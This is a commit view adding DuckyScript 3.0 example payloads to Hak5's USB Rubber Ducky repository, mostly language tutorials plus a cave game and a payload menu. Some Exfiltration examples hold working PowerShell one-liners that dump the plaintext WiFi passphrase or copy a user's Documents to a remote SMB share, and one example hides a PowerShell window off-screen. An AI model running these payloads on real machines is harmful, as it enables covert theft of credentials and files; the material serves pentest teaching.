hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'hak5:master' into master

pull/123/head
DIYS.py 2022-08-20 23:22:58 -04:00 committed by GitHub
parent 5bbdf34b5c c3ccb28053
commit a034ebd371
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
63 changed files with 2594 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
README.md
View File

@ -8,8 +8,8 @@ A "flash drive" that types keystroke injection payloads into unsuspecting comput
- [Purchase at Hak5](https://hak5.org/products/usb-rubber-ducky-deluxe "Purchase at Hak5")
- [Documentation](https://help.hak5.org/usb-rubber-ducky-1/ "Documentation")
- [Encoder](https://downloads.hak5.org/ducky "Encoder")
- [Forums](https://forums.hak5.org/forum/56-usb-rubber-ducky/ "Forums")
- [Encoder](https://payloadstudio.hak5.org "Encoder")
- [Forums](https://forums.hak5.org/forum/111-new-usb-rubber-ducky/ "Forums")
- [Discord](https://hak5.org/discord "Discord")
![USB Rubber Ducky](https://cdn.shopify.com/s/files/1/0068/2142/products/rubber_ducky_300x.jpg)

1
payloads/examples/ATTACKMODE/ATTACKMODE-example1.txt Normal file
View File

@ -0,0 +1 @@
REM The ATTACKMODE command may be used multiple times throughout a payload. REM Changing the attack mode will cause the target to re-enumerate the device. ATTACKMODE HID DELAY 2000 STRINGLN The USB Rubber Ducky is functioning as a keyboard. STRINGLN It will function as a flash drive for the next 30 seconds. ATTACKMODE STORAGE DELAY 30000 ATTACKMODE HID DELAY 2000 STRINGLN Now the USB Rubber Ducky is back to functioning as only a keyboard. STRINGLN For the next 30 seconds it will function as both keyboard and storage. ATTACKMODE HID STORAGE DELAY 30000 STRINGLN Now the USB Rubber Ducky will disable itself. ATTACKMODE OFF REM This payload will begin by enumerating as a HID keyboard. REM The USB Rubber Ducky will then enumerate as a mass storage "flash drive" for 30 seconds. REM Once more it will be enumerated as only a HID keyboard. REM Next it will enumerate as both a HID keyboard and a mass storage "flash drive". REM Finally, the device will seem to be disconnected.

4
payloads/examples/ATTACKMODE/ATTACKMODE-example2.txt Normal file
View File

@ -0,0 +1,4 @@
REM Within a payload the ATTACKMODE command may be executed multiple times. REM In some situations it can be useful to "remember" an ATTACKMODE state, for later recall. REM The SAVE_ATTACKMODE command will save the currently running ATTACKMODE state (including any specified VID, PID, MAN, PROD and SERIAL parameters) such that it may be later restored. REM The RESTORE_ATTACKMODE command will restore a previously saved ATTACKMODE state. ATTACKMODE HID STORAGE VID_05AC PID_021E MAN_HAK5 PROD_DUCKY SERIAL_1337 BUTTON_DEF RESTORE_ATTACKMODE STRINGLN The ATTACKMODE has been restored. END_BUTTON STRING The USB Rubber Ducky is now in STRINGLN an ATTACKMODE HID STORAGE. SAVE_ATTACKMODE STRINGLN This state has been saved. STRINGLN Now entering ATTACKMODE OFF... STRING Press the button to restore STRINGLN the ATTACKMODE. ATTACKMODE OFF
REM The USB Rubber Ducky will be recognized as a composite USB device with both HID and STORAGE features. REM Strings will be typed informing the user of the save state, the button functionality, and entering ATTACKMODE OFF. REM Pressing the button will restore the previously initialized ATTACKMODE.

1
payloads/examples/Button/Button-example1.txt Normal file
View File

@ -0,0 +1 @@
REM WAIT_FOR_BUTTON_PRESS halts payload execution until a button press is detected. REM When this command is reached in the payload, no further execution will occur. The button definition (either set using BUTTON_DEF or the arming-mode default) will be suppressed. STRING Press the button... WAIT_FOR_BUTTON_PRESS STRING The button was pressed! REM The text "The button was pressed!" will not be typed until the button is pressed.

1
payloads/examples/Button/Button-example2.txt Normal file
View File

@ -0,0 +1 @@
STRING Press the button 3 times... WAIT_FOR_BUTTON_PRESS STRING 1... WAIT_FOR_BUTTON_PRESS STRING 2... WAIT_FOR_BUTTON_PRESS STRING 3... You did it! REM The button must be pressed 3 times to complete the payload.

1
payloads/examples/Button/Button-example3.txt Normal file
View File

@ -0,0 +1 @@
LED_R REM First Stage Payload Code... REM Wait for operator to assess target REM before executing second stage. WAIT_FOR_BUTTON_PRESS LED_G REM Second Stage Payload Code... REM The operator is instructed to press the button as soon as the target is ready for the next stage. REM The LED command is used to indicate to the operator that the payload is waiting for a button press.

1
payloads/examples/Button/Button-example4.txt Normal file
View File

@ -0,0 +1 @@
REM BUTTON_DEF defines a function which will execute when the button is pressed anytime within the payload so long as the button control is not already in use by the WAIT_FOR_BUTTON_PRESS command or other such function. REM By default, if no button definition (BUTTON_DEF) is included in the payload, the button will stop all further payload execution and invoke ATTACKMODE STORAGE — entering the USB Rubber Ducky into arming mode. REM Similar to functions (described later), which begin with FUNCTION NAME() and with END_FUNCTION, the button definition begins with BUTTON_DEF and ends with END_BUTTON. BUTTON_DEF STRING The button was pressed! STOP_PAYLOAD END_BUTTON WHILE TRUE STRING . DELAY 1000 END WHILE REM The payload will type a period every second until the button is pressed. REM Once the button is pressed, the payload will type the text “The button was pressed!” REM After the button press text is typed, the payload will terminate.

1
payloads/examples/Button/Button-example5.txt Normal file
View File

@ -0,0 +1 @@
BUTTON_DEF WHILE TRUE LED_R DELAY 1000 LED_OFF DELAY 1000 END_WHILE END_BUTTON STRING Press the button at any point to blink the LED red WHILE TRUE STRING . DELAY 1000 END WHILE REM If the button is pressed at any point in the payload it will stop typing “.” and the LED will start blink red until the device is unplugged.

1
payloads/examples/Button/Button-example6.txt Normal file
View File

@ -0,0 +1 @@
BUTTON_DEF REM This is the first button definition STRINGLN The button was pressed once! BUTTON_DEF REM This second button definition REM overwrites the first STRINGLN The button was pressed twice! END_BUTTON END_BUTTON STRING Press the button twice to see STRING how nested button definitions work! ENTER WHILE TRUE STRING . DELAY 1000 END WHILE REM If the button is pressed once at any point in the payload it will stop typing “.” and the first button definition will be executed. REM When the first button definition is executed, a secondary button definition will be implemented. REM If the button pressed a second time, the newly implement second button definition will execute.

1
payloads/examples/Button/Button-example7.txt Normal file
View File

@ -0,0 +1 @@
REN The DISABLE_BUTTON command prevents the button from calling the BUTTON_DEF. BUTTON_DEF STRING This will never execute END_BUTTON DISABLE_BUTTON STRING The button is disabled WHILE TRUE STRING . DELAY 1000 END_WHILE REM The DISABLE_BUTTON command disables the BUTTON_DEF. REM The button definition which types "This will never execute", will never execute — even if the button is pressed.

1
payloads/examples/Button/Button-example8.txt Normal file
View File

@ -0,0 +1 @@
ATTACKMODE_OFF LED_OFF DISABLE_BUTTON REM The USB Rubber Ducky will be effectively disabled.

1
payloads/examples/Button/Button-example9.txt Normal file
View File

@ -0,0 +1 @@
REM The ENABLE_BUTTON command allows pressing the button to call the BUTTON_DEF. BUTTON_DEF STRINGLN The button was pressed! STRINGLN Continuing the payload... END_BUTTON WHILE TRUE DISABLE_BUTTON STRING The button is disabled for the next STRINGLN 5 seconds... STRINGLN Pressing the button will do nothing... DELAY 5000 ENABLE_BUTTON STRING The button is enabled for the next STRINGLN 5 seconds... STRING Pressing the button will execute STRINGLN the button definition... DELAY 5000 END_WHILE REM The payload will alternate between the button being enabled and disabled. REM If the button is pressed within the 5 second disabled window, nothing will happen. REM If the button is pressed within the 5 second enabled window, the button definition will be executed and "The button was pressed!" will be typed. REM The payload will loop forever.

1
payloads/examples/Conditions/Conditions-example1.txt Normal file
View File

@ -0,0 +1 @@
REM The flow control statement IF will determine whether or not to execute its block of code based on the evaluation of an expression. One way to interpret an IF statement is to read it as "IF this condition is true, THEN do this". REM The IF statement consists of these parts REM - The IF keyword REM - The condition, or expression that evaluates to TRUE or FALSE REM - In most cases, the expression is surrounded by parenthesis ( ) REM - The THEN keyword REM - One or more newlines containing the block of code to execute REM - The END_IF keyword REM Example IF THEN $FOO = 42 $BAR = 1337 IF ( $FOO < $BAR ) THEN STRING 42 is less than 1337 END_IF REM The expression "Is 42 less than 1337" is evaluated and determined to be TRUE. REM Because the IF condition is TRUE, the code between the keywords THEN and END_IF are executed. REM The string "42 is less than 1337" is typed.

1
payloads/examples/Conditions/Conditions-example2.txt Normal file
View File

@ -0,0 +1 @@
REM The ELSE statement is an optional component of the IF statement which will only execute when the IF statement condition is FALSE. One way to interpret an ELSE statement is to read it as "IF this condition is true, THEN do this thing, or ELSE do another thing". REM Example IF THEN ELSE IF ( $_CAPSLOCK_ON == TRUE ) THEN STRING Capslock is on! ELSE IF ( $_CAPSLOCK_ON == FALSE ) THEN STRING Capslock is off! END_IF REM The condition of the capslock key, as determined by the target operating system, is checked. REM If the caps lock key state has been reported by the target as ON, the string "Capslock is on" will be typed. REM Otherwise, if the capslock key state has not been reported by the target (or it has been reported as not being on), the string "Capslock is off" will be typed.

3
payloads/examples/Conditions/Conditions-example3.txt Normal file
View File

@ -0,0 +1,3 @@
REM A nested IF statement is quite simply an IF statement placed inside another IF statement. Nested IF statements may be used when evaluating a combination of conditions. REM Example nested IF statements IF ( $_CAPSLOCK_ON == TRUE ) THEN IF ( $_NUMLOCK_ON == TRUE ) THEN STRING Both Capslock and Numlock are on! END_IF END_IF REM The condition of the first IF statement is evaluated — whether or not the target has reported that the caps lock key is on. If it is TRUE, then the nested IF statement will run.
REM The second IF statement is evaluated much like the first, only this time checking the status of the num lock key.
REM If both the capslock and numlock keys have been reported by the target as being on, then the string "Both Capslock and Numlock are on!" will be typed.

2
payloads/examples/Conditions/Conditions-example4.txt Normal file
View File

@ -0,0 +1,2 @@
REM In some cases it may be more efficient to use logical operators within a single IF statement, rather than using a nested IF structure. REM Example IF statement with logical operators IF (( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == TRUE )) THEN STRING Both Capslock and Numlock are on! END_IF REM Because the AND logical operator is in use, the whole condition will only evaluate as TRUE if both sub conditions are TRUE.
REM Similar to the Nested IF example, the string "Both Capslock and Numlock are on!" will only be typed if both capslock and numlock are reported by the target as being on.

2
payloads/examples/Conditions/Conditions-example5.txt Normal file
View File

@ -0,0 +1,2 @@
REM The syntax of IF states that in nearly all cases the expression should be surrounded by parenthesis ( ) — however there is an exception to this rule. REM If the condition of only one variable is true or false, the parenthesis may be omitted. This results in a slightly smaller encoded inject.bin file as well as slightly faster payload execution. This is because it removes the step of first reducing the order precedence. REM Example of optimized and unoptimized IF statements REM Consider VAR $FLAG = TRUE IF $FLAG THEN STRING FLAG is TRUE END_IF REM versus IF ( $FLAG == TRUE ) THEN STRING FLAG is TRUE END_IF REM In the first example, the IF statement without the parenthesis results in a 6 bytes added to the compiled inject.bin file.
REM In the second example, the IF statement surrounded by parenthesis results in 16 bytes added to the compiled inject.bin file.

2
payloads/examples/Conditions/Conditions-example6.txt Normal file
View File

@ -0,0 +1,2 @@
REM Example of optimized IF statement REM with internal variable IF $_CAPSLOCK_ON THEN STRINGLN The caps lock key is on END_IF REM The internal variable $_CAPSLOCK_ON is checked.
REM If it evaluates as TRUE, the message “The caps lock key is on” is typed.

303
payloads/examples/Example_Payloads/konami_cave.txt Normal file
View File

@ -0,0 +1,303 @@
REM Boots as STORAGE, starts a game of cave in a text editor after konami code
REM COMPATABILITY:
REM DuckyScript 3.0
REM TARGET:
REM Any host that will reflect CAPSLOCK
REM DEPLOYMENT:
REM Plug in Ducky. To Start a game of cave:
REM Open PayloadStudio Console, notepad or text editor, make sure cursor is active there
REM Press the button on the Ducky
REM Press CAPSLOCK on the host machine lock 5 times
REM Press the Duck button to confirm and start game
REM Good luck!
ATTACKMODE STORAGE
LED_G
WAIT_FOR_BUTTON_PRESS
LED_OFF
ATTACKMODE HID STORAGE
LED_G
WAIT_FOR_CAPS_CHANGE
LED_OFF
WAIT_FOR_CAPS_CHANGE
LED_G
WAIT_FOR_CAPS_CHANGE
LED_OFF
WAIT_FOR_CAPS_CHANGE
LED_G
WAIT_FOR_CAPS_CHANGE
LED_R
WAIT_FOR_BUTTON_PRESS
LED_G
DEFINE RIGHT 0
DEFINE LEFT 1
DEFINE GAME_MAX_WIDTH 40
DEFINE GAME_SPEED 200
VAR $mode = RIGHT
VAR $lock_state = FALSE
VAR $score = 0
VAR $running = TRUE
VAR $direction_changes = 0
VAR $D = 0
VAR $INPUT = 0
VAR $MOD = 0
VAR $P = FALSE
FUNCTION PRINTDIGIT()
IF ($D == 0) THEN
STRING 0
ELSE IF ($D == 1) THEN
STRING 1
ELSE IF ($D == 2) THEN
STRING 2
ELSE IF ($D == 3) THEN
STRING 3
ELSE IF ($D == 4) THEN
STRING 4
ELSE IF ($D == 5) THEN
STRING 5
ELSE IF ($D == 6) THEN
STRING 6
ELSE IF ($D == 7) THEN
STRING 7
ELSE IF ($D == 8) THEN
STRING 8
ELSE IF ($D == 9) THEN
STRING 9
ELSE
STRING ?
END_IF
END_FUNCTION
FUNCTION CONSUME()
$D = 0
WHILE ($INPUT >= $MOD)
$D = ($D + 1)
$INPUT = ($INPUT - $MOD)
END_WHILE
IF (($D > 0) || ($P == TRUE)) THEN
$P = TRUE
PRINTDIGIT()
END_IF
END_FUNCTION
FUNCTION TRANSLATE_INT()
$P = FALSE
IF ( $INPUT >= 10000) THEN
$MOD = 10000
CONSUME()
END_IF
IF (($INPUT >= 1000) || ($P == TRUE)) THEN
$MOD = 1000
CONSUME()
END_IF
IF (($INPUT >= 100) || ($P == TRUE)) THEN
$MOD = 100
CONSUME()
END_IF
IF (($INPUT >= 10) || ($P == TRUE)) THEN
$MOD = 10
CONSUME()
END_IF()
$D = $INPUT
PRINTDIGIT()
ENTER
END_FUNCTION
FUNCTION TRANSLATE_BOOL()
IF ($INPUT == TRUE) THEN
STRING TRUE
ELSE IF ($INPUT == FALSE) THEN
STRING FALSE
ELSE
STRING ?
END_IF
ENTER
END_FUNCTION
VAR $CD = 3
FUNCTION COUNTDOWN()
WHILE ( $CD > 0 )
STRING .
$CD = ($CD - 1)
DELAY 1000
END_WHILE
END_FUNCTION
FUNCTION ENSURE_CAPS_OFF()
IF ($_CAPSLOCK_ON == TRUE) THEN
CAPSLOCK
END_IF
END_FUNCTION
FUNCTION init()
$_RANDOM_MIN = 9
$_RANDOM_MAX = 19
VAR $l_wall = $_RANDOM_INT
$_RANDOM_MIN = 20
$_RANDOM_MAX = 29
VAR $player = $_RANDOM_INT
$_RANDOM_MIN = 30
$_RANDOM_MAX = 40
VAR $r_wall = $_RANDOM_INT
END_FUNCTION
FUNCTION check_input()
VAR $changed = FALSE
IF ($_CAPSLOCK_ON != $lock_state) THEN
$lock_state = $_CAPSLOCK_ON
$direction_changes = ($direction_changes + 1)
IF ($mode == RIGHT) THEN
$mode = LEFT
ELSE
$mode = RIGHT
END_IF
END_IF
END_FUNCTION
FUNCTION end_game()
LED_R
$running = FALSE
END_FUNCTION
FUNCTION move_walls()
$_RANDOM_MIN = 0
$_RANDOM_MAX = 100
VAR $CHANCE = $_RANDOM_INT
IF ($CHANCE > 45) THEN
IF ($l_wall < GAME_MAX_WIDTH) THEN
$l_wall = ($l_wall + 1)
REM STRING l+
END_IF
ELSE
IF ($l_wall > 0) THEN
$l_wall = ($l_wall - 1)
REM STRING l-
ELSE
$l_wall = ($l_wall + 1)
END_IF
END_IF
$CHANCE = $_RANDOM_INT
IF ($CHANCE > 45) THEN
IF ($r_wall > 0) THEN
$r_wall = ($r_wall - 1)
REM STRING r-
END_IF
ELSE
IF ($r_wall < GAME_MAX_WIDTH) THEN
$r_wall = ($r_wall + 1)
REM STRING r+
ELSE
$r_wall = ($r_wall - 1)
END_IF
END_IF
REM ENTER
END_FUNCTION
FUNCTION move_player()
IF ($mode == RIGHT) THEN
IF ($player < GAME_MAX_WIDTH) THEN
$player = ($player + 1)
END_IF
ELSE IF ($mode == LEFT) THEN
IF ($player > 0) THEN
$player = ($player - 1)
END_IF
END_IF
END_FUNCTION
FUNCTION draw()
IF (($player <= $l_wall) || ($player >= $r_wall)) THEN
end_game()
STRING BONK
RETURN 0
END_IF
VAR $l_inside_whitespace = (($player - $l_wall) - 1)
VAR $r_inside_whitespace = (($r_wall - $player) - 1)
IF ($l_wall > 1) THEN
VAR $l_outside_whitespace = ($l_wall - 1)
WHILE ($l_outside_whitespace > 0)
SPACE
$l_outside_whitespace = ($l_outside_whitespace - 1)
END_WHILE
END_IF
STRING |
WHILE ($l_inside_whitespace > 0)
SPACE
$l_inside_whitespace = ($l_inside_whitespace - 1)
END_WHILE
IF ($mode == RIGHT) THEN
STRING >
ELSE IF ($mode == LEFT) THEN
STRING <
END_IF
WHILE ($r_inside_whitespace > 0)
SPACE
$r_inside_whitespace = ($r_inside_whitespace - 1)
END_WHILE
STRING |
ENTER
$score = ($score + 1)
RETURN 0
END_FUNCTION
FUNCTION run()
check_input()
move_walls()
check_input()
move_player()
check_input()
draw()
END_FUNCTION
FUNCTION play_cave()
WHILE TRUE
ENSURE_CAPS_OFF()
$score = 0
LED_G
ENTER
STRING Game Starting in 3s
$CD = 3
COUNTDOWN()
ENTER
STRING GOOD LUCK!
ENTER
ENTER
init()
WHILE ($running == TRUE)
DELAY GAME_SPEED
run()
END_WHILE
ENSURE_CAPS_OFF()
ENTER
STRING Left wall
$INPUT = $l_wall
TRANSLATE_INT()
STRING Right wall:
$INPUT = $r_wall
TRANSLATE_INT()
STRING Player position:
$INPUT = $player
TRANSLATE_INT()
STRING GAME OVER. SCORE:
$INPUT = $score
TRANSLATE_INT()
STRING Player Moves:
$INPUT = $direction_changes
TRANSLATE_INT()
DELAY 1000
STRING Press CAPS to play again.
WAIT_FOR_CAPS_CHANGE
$running = TRUE
DELAY 100
END_WHILE
END_FUNCTION
BUTTON_DEF
end_game()
END_BUTTON
play_cave()

101
payloads/examples/Example_Payloads/payload_menu.txt Normal file
View File

@ -0,0 +1,101 @@
REM Example Injection/Text Based Payload selection
REM COMPATABILITY:
REM DuckyScript 3.0
REM TARGET:
Any host that will reflect NUMLOCK
REM USAGE:
REM Replace the Hello Payload 1/2/3 stubs below with payloads of your choice.
REM DEPLOYMENT:
REM Open PayloadStudio Console, notepad or text editor, make sure cursor is active there
REM Plug in Ducky
REM Hit NUMLOCK on the host machine to cycle through modes
REM Hit the button on the Ducky to confirm current selection
REM Replace Example Modes with desired payloads - marked via comments below
DELAY 1000
VAR $SELECTED = 0
DEFINE MODE_MAX 2
DEFINE MODE_1 0
DEFINE MODE_2 1
DEFINE MODE_3 2
FUNCTION inc_mode()
IF ($SELECTED == MODE_MAX) THEN
$SELECTED = 0
ELSE
$SELECTED = ($SELECTED + 1)
END_IF
END_FUNCTION
BUTTON_DEF
ENTER
STRING SELECTION MADE
ENTER
$MODE_SELECTED = TRUE
END_BUTTON
FUNCTION draw_menu()
ENTER
STRINGLN Menu
STRING [
IF ($SELECTED == MODE_1) THEN
STRING *
END_IF
STRINGLN ] PAYLOAD 1
STRING [
IF ($SELECTED == MODE_2) THEN
STRING *
END_IF
STRINGLN ] PAYLOAD 2
STRING [
IF ($SELECTED == MODE_3) THEN
STRING *
END_IF
STRINGLN ] PAYLOAD 3
END_FUNCTION
FUNCTION run_menu()
VAR $MODE_SELECTED = FALSE
VAR $NUMSTATE = $_NUMLOCK_ON
draw_menu()
WHILE ($MODE_SELECTED == FALSE)
IF ($NUMSTATE != $_NUMLOCK_ON) THEN
$NUMSTATE = $_NUMLOCK_ON
inc_mode()
draw_menu()
END_IF
DELAY 200
END_WHILE
DELAY 1000
$_BUTTON_USER_DEFINED = FALSE
IF ($SELECTED == MODE_1) THEN
STRINGLN PAYLOAD 1
ELSE IF ($SELECTED == MODE_2) THEN
STRINGLN PAYLOAD 2
ELSE IF ($SELECTED == MODE_3) THEN
STRINGLN PAYLOAD 3
END_IF
END_FUNCTION
STRING PRESS NUMLOCK to change selection
ENTER
STRING PRESS BUTTON to confirm selection
ENTER
run_menu()
REM PAYLOADS/MODES
IF ($SELECTED == MODE_1) THEN
REM PLACE PAYLOAD 1 HERE
STRING Hello Payload 1!
ELSE IF ($SELECTED == MODE_2) THEN
REM PLACE PAYLOAD 2 HERE
STRING Hello Payload 2!
ELSE IF ($SELECTED == MODE_3) THEN
REM PLACE PAYLOAD 3 HERE
STRING Hello Payload 3!
END_IF

1
payloads/examples/Exfiltration/Exfiltration-example1.txt Normal file
View File

@ -0,0 +1 @@
REM Example Simple USB Exfiltration Technique for Windows ATTACKMODE HID STORAGE DELAY 2000 GUI r DELAY 100 STRING powershell “$m=(Get-Volume -FileSystemLabel DUCKY).DriveLetter;netsh wlan show profile name=(Get-NetConnectionProfile).Name key=clear|?{$_-matchSSID n|Key C}|%{($_ -split:)[1]}>>$m:\$env:computername.txt” ENTER REM This short Powershell one-liner executes from the Windows Run dialog. REM The drive letter of the volume with the label “DUCKY” is saved as $m. REM The netsh command will get the network name and passphrase for the currently connected network ((Get-NetConnectionProfile).Name). REM The results of the netsh command (filtered for only SSID and key) will be redirected (saved) to a file on the root of the “DUCKY” drive, saved as the computer name (in .txt format).

1
payloads/examples/Exfiltration/Exfiltration-example2.txt Normal file
View File

@ -0,0 +1 @@
REM Example Simple SMB Exfiltration Method for Windows ATTACKMODE HID DELAY 2000 DEFINE SMB_SERVER example.com DEFINE SMB_SHARE sharedfolder GUI r DELAY 100 STRING powershell “cp -r $env:USERPROFILE\Documents\* \\ STRING SMB_SERVER STRING \ STRING SMB_SHARE STRING “ ENTER REM This short Powershell one-liner, executed from the Windows Run dialog, will copy all documents (including subfolders) from the currently logged in user accounts documents folder to the defined SMB share.

15
payloads/examples/Exfiltration/Exfiltration-example3.txt Normal file
View File

@ -0,0 +1,15 @@
REM Example Simple Keystroke Reflection Attack for Windows REM Saves currently connected wireless LAN profile to DUCKY ATTACKMODE HID LED_OFF DELAY 2000 SAVE_HOST_KEYBOARD_LOCK_STATE $_EXFIL_MODE_ENABLED = TRUE $_EXFIL_LEDS_ENABLED = TRUE REM Store the currently connected WiFi SSID & Key to %tmp%\z GUI r DELAY 100 STRINGLN powershell "netsh wlan show profile name=(Get-NetConnectionProfile).Name key=clear|?{$_-match'SSID n|Key C'}|%{($_ -split':')[1]}>$env:tmp\z" DELAY 100 REM Convert the stored creds into CAPSLOCK and NUMLOCK values. GUI r DELAY 100 STRINGLN powershell "foreach($b in $(cat $env:tmp\z -En by)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if($b-band$a){$o+='%{NUMLOCK}'}else{$o+='%{CAPSLOCK}'}}}; $o+='%{SCROLLLOCK}';echo $o >$env:tmp\z" DELAY 100 REM Reflect the CAPSLOCK and NUMLOCK Keystrokes back to the Ducky. GUI r DELAY 100 STRINGLN powershell "$o=(cat $env:tmp\z);Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($o);rm $env:tmp\z" DELAY 100 REM The final SCROLLLOCK keystroke indicates EXFIL is complete. WAIT_FOR_SCROLL_CHANGE LED_G $_EXFIL_MODE_ENABLED = FALSE RESTORE_HOST_KEYBOARD_LOCK_STATE
REM Per the initial ATTACKMODE command. the USB Rubber Ducky will act as a HID keyboard.
REM SAVE_HOST_KEYBOARD_LOCK_STATE will save the state of the lock key LEDs, as reported by the target, so that they may be restored to their original configuration after the Keystroke Reflection attack is performed.
REM $_EXFIL_MODE_ENABLED = TRUE will instruct the USB Rubber Ducky to listen for control codes on the USB HID OUT endpoint, saving each change as a bit within loot.bin.
REM $_EXFIL_LEDS_ENABLED = TRUE will show flash the USB Rubber Ducky LED as loot is saved, useful when debugging. Set as FALSE for a more stealthy operation, however the flash drive case should sufficiently conceal the LED.
REM The first powershell one-liner, injected into the run dialog, will save the currently connected WiFi network name (SSID) and plaintext passphrase to a temporary file. The file, known as the "loot", is saved as "z" within %TEMP% ($env:tmp\z) directory, encoded in standard ASCII.
REM The second powershell one-liner will convert the temporary ASCII loot file, bit by bit, into a set of caps lock and num lock key values. It will conclude this file with a final scroll lock value.
REM The third and final powershell one-liner, in software, will "press" the lock keys indicated by the temporary file via the SendKeys .NET class. The effect of this will be the binary values of the converted loot sent to the USB Rubber Ducky, one bit at a time, via the USB HID OUT endpoint.
REM Additionally, the temporary file will then be removed. The pentester may consider including additional techniques for obfuscation, optimization and reducing the forensic footprint.
REM WAIT_FOR_SCROLL_CHANGE will get triggered when the final key "press" from the SendKeys class is executed, thereby continuing the payload.
REM Finally $_EXFIL_MODE_ENABLED = FALSE will instruct the USB Rubber Ducky to conclude saving the received control codes in loot.bin and RESTORE_HOST_KEYBOARD_LOCK_STATE will restore the lock key LEDs to their original state before the exfiltration began.

1
payloads/examples/Exfiltration/Exfiltration-example4.txt Normal file
View File

@ -0,0 +1 @@
REM Example variable exfiltration VAR $FOO = 1337 EXFIL $FOO REM The binary contents of the variable $FOO will be written (appended) to the loot.bin file on the root of the USB Rubber Ducky MicroSD card.

5
payloads/examples/Functions/Functions-example1.txt Normal file
View File

@ -0,0 +1,5 @@
REM Example Function FUNCTION COUNTDOWN() WHILE ($TIMER > 0) STRING . $TIMER = ($TIMER - 1) DELAY 500 END_WHILE END_FUNCTION STRING And then it happened VAR $TIMER = 3 COUNTDOWN() SPACE STRING a door opened to a world $TIMER = 5 COUNTDOWN()
REM The FUNCTION command defines a new function named COUNTDOWN() containing a code block with a WHILE loop which types a single period (".") for each value of $TIMER.
REM The first time the COUNTDOWN() function is called, the $TIMER variable holds the value 3. The second time it is called, the $TIMER variable holds the value 5.
REM The string "And then it happened... a door opened to a world....." will be typed.

5
payloads/examples/Functions/Functions-example2.txt Normal file
View File

@ -0,0 +1,5 @@
REM Example FUNCTION with RETURN ATTACKMODE HID DELAY 2000 BUTTON_DEF STRING ! END_BUTTON FUNCTION TEST_BUTTON() STRING Press the button within the next 5 seconds. VAR $TIMER = 5 WHILE ($TIMER > 0) STRING . DELAY 1000 $TIMER = ($TIMER - 1) END_WHILE ENTER IF ($_BUTTON_PUSH_RECEIVED == TRUE) THEN RETURN TRUE ELSE IF ($_BUTTON_PUSH_RECEIVED == FALSE) THEN RETURN FALSE END_IF $_BUTTON_PUSH_RECEIVED = FALSE END_FUNCTION IF (TEST_BUTTON() == TRUE) THEN STRINGLN The button was pressed! ELSE STRINGLN The button was not pressed! END_IF
REM When the IF statement on line 26 checks the condition of the function TEST_BUTTON, the function is called and executed.
REM Based on whether or not the button is pressed, the RETURN value (lines 19 and 21) will be set to TRUE or FALSE.
REM The IF statement on line 26 evaluates the RETURN of the function TEST_BUTTON and types the result accordingly.

7
payloads/examples/Holding Keys/Holding-Keys-example1.txt Normal file
View File

@ -0,0 +1,7 @@
REM Example HOLD and RELEASE REM Target: Windows ATTACKMODE HID STORAGE DELAY 2000 REM Open Powershell GUI r DELAY 1000 STRING powershell ENTER REM Hide Powershell Window DELAY 2000 ALT SPACE DELAY 100 m DELAY 100 HOLD DOWNARROW DELAY 3000 RELEASE DOWNARROW ENTER REM Run desired commands in obfuscated powershell window STRING tree c:\ ENTER
REM This example payload targets Windows systems.
REM Using the GUI r key combo to open the Run dialog, a powershell window will be opened.
REM The ALT SPACE key combo opens the window menu of the currently active window (in this case, the powershell window), followed by the m key to select the Move command.
REM The DOWNARROW is held for 3 seconds, as specified by the DELAY 3000 command, before being released — thus hiding the contents of the powershell window below the screen.
REM The benign tree c:\ command is run, producing a graphical directory structure of the disk.

1
payloads/examples/Holding Keys/Holding-Keys-example2.txt Normal file
View File

@ -0,0 +1 @@
REM Example modifier key hold ATTACKMODE HID STORAGE DELAY 2000 INJECT_MOD HOLD CONTROL DELAY 4000 RELEASE CONTROL REM The CONTROL key will be held for 4 seconds.

1
payloads/examples/Holding Keys/Holding-Keys-example3.txt Normal file
View File

@ -0,0 +1 @@
REM Example holding multiple keys ATTACKMODE HID STORAGE DELAY 2000 STRING iddqd DELAY 500 WHILE TRUE STRING idkfa DELAY 500 HOLD LEFTARROW HOLD UPARROW INJECT_MOD HOLD CONTROL DELAY 5000 INJECT_MOD RELEASE CONTROL RELEASE UPARROW RELEASE LEFTARROW DELAY 500 END_WHILE REM Answering the age old question, "will it run doom?", this payload proves the 1993 classic first-person shooter no match for the USB Rubber Ducky. REM More specifically, this payload will cause Doom Guy to walk in circles firing his weapon.

4
payloads/examples/Jitter/Jitter-example1.txt Normal file
View File

@ -0,0 +1,4 @@
REM Example Jitter ATTACKMODE HID STORAGE DELAY 2000 $_JITTER_ENABLED = TRUE WHILE TRUE STRINGLN The quick brown fox jumps over the lazy dog END_WHILE
REM The test string is typed continuously with a modulated delay between each key press.

1
payloads/examples/Jitter/Jitter-example2.txt Normal file
View File

@ -0,0 +1 @@
REM Example Jitter with increasing $_JITTER_MAX ATTACKMODE HID STORAGE DELAY 2000 $_JITTER_ENABLED = TRUE WHILE TRUE STRINGLN The quick brown fox jumps over the lazy dog $_JITTER_MAX = ($_JITTER_MAX * 2) END_WHILE REM With each iteration of typing the test string the jitter limit is doubled, yielding slower and more sporadic typing.

3
payloads/examples/LED/LED-example1.txt Normal file
View File

@ -0,0 +1,3 @@
REM The LED_R command will enable the red LED. REM To show only a red LED disable any default LED behavior (such as storage or payload processing) by executing LED_OFF before LED_R.
ATTACKMODE HID STORAGE WHILE TRUE IF ($_CAPSLOCK_ON == TRUE) THEN LED_OFF LED_R ELSE IF ($_CAPSLOCK_ON == FALSE) THEN LED_OFF END_IF END_WHILE REM The LED will turn solid red while caps lock is on.

1
payloads/examples/LED/LED-example2.txt Normal file
View File

@ -0,0 +1 @@
REM The LED_G command will enable the green LED. ATTACKMODE HID STORAGE BUTTON_DEF LED_OFF STOP_PAYLOAD END_BUTTON WHILE TRUE LED_OFF LED_G DELAY 1000 LED_OFF LED_R DELAY 1000 END_WHILE REM The LED will alternate between solid red and solid green at one second intervals. REM Pressing the button will turn the LED off and stop the payload.

1
payloads/examples/LED/LED-example3.txt Normal file
View File

@ -0,0 +1 @@
ATTACKMODE HID STORAGE WHILE TRUE LED_R WAIT_FOR_BUTTON_PRESS LED_G WAIT_FOR_BUTTON_PRESS END_WHILE REM The LED will alternate between red and green on each button press.
